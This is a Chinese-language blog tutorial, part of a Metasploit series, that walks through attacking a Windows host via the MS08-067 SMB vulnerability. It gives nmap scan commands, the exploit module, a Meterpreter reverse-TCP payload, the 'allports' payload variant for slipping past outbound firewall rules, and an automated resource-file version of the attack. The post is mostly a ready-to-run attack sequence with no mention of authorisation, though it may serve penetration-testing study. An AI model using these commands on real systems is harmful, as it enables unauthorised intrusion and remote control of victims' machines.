• metasploit——(三)渗透攻击之旅


    以下利用metasploit攻击网站的具体思路:

      1、先判断开放了哪些端口  

        nmap  -sT -A  --script=smb-vuln-ms08-067  -P0 192.167.2.2

      2、根据开放的端口服务,寻找相应的漏洞攻击模块

        search  ms08-067_netapi

        use exploit/windows/smb/ms08-067_netapi

        show payload   寻找适合这个模块的攻击载荷

        set  payload  windows/meterpreter/reverse_tcp

        show  options   查看需要设置哪些参数

        set  LHOST xxxx

        set  RHOST  xxx

        set  LPORT   xx

        exploit    对目标尝试攻击。

        反弹回   meterpreter  shell

      在上面的例子中,我们之所以能够成功,主要是由于目标主机反弹连接使用的端口没有被过滤掉。但是如果我们攻击的组织内部设置了非常严格的出站端口怎么办?我们可以猜测443端口没有被防火墙禁止,同样的可能还有FTP、telnet、ssh等服务使用的端口,可以逐一尝试。。幸运的是,metasploit提供了一个专用的攻击载荷帮助我们找到这些放行的端口。。

    下面我们使用这个攻击载荷,让它尝试对所有端口进行连接,直到找到成功连接的端口为止。。

        use exploit/windows/smb/ms08-067_netapi

        set  LHOST xxxx

        set  RHOST  xxx

        set  LPORT   xx

        search ports

        set payload windows/meterpreter/reverse_tcp_allports

        exploit  -j          返回结果会显示出与目标主机的哪个端口建立了连接。。

        session  -l  -v     返回session 的 ID

        session   -i    id号

        最后反弹回   meterpreter

    以下是一些其他相关信息:

      资源文件:是msf终端内包含一系列自动化命令的脚本文件。。。

        比如:  echo  use  exploit/windows/smb/ms08_067_netapi  > autoexploit.rc

           echo  set RHOST  1.2.3.2      >> autoexploit.rc

            echo exploit   >> autoexploit.rc  (此处有省略)

           进入msf终端    运行    resource   autoexxploit.rc    回车

            autoexploit.rc文件内的命令就会依次执行。。。。可以大大减少测试和开发的时间。。。

            

  • 相关阅读:
    打jar包的命令
    WebServiceWSDLWeb
    linux命令之检测端口是否启用
    mybatis generator 插件安装及使用
    Mybatis 中一对多,多对一的配置
    大数据时代日志分析平台ELK的搭建
    关于RestfulAPI与SpringMVC之间的传值
    linux快速清空文件内容
    Linux之第一个shell命令
    Linux之yum
  • 原文地址:https://www.cnblogs.com/hdsec/p/9524162.html
Copyright © 2020-2023  润新知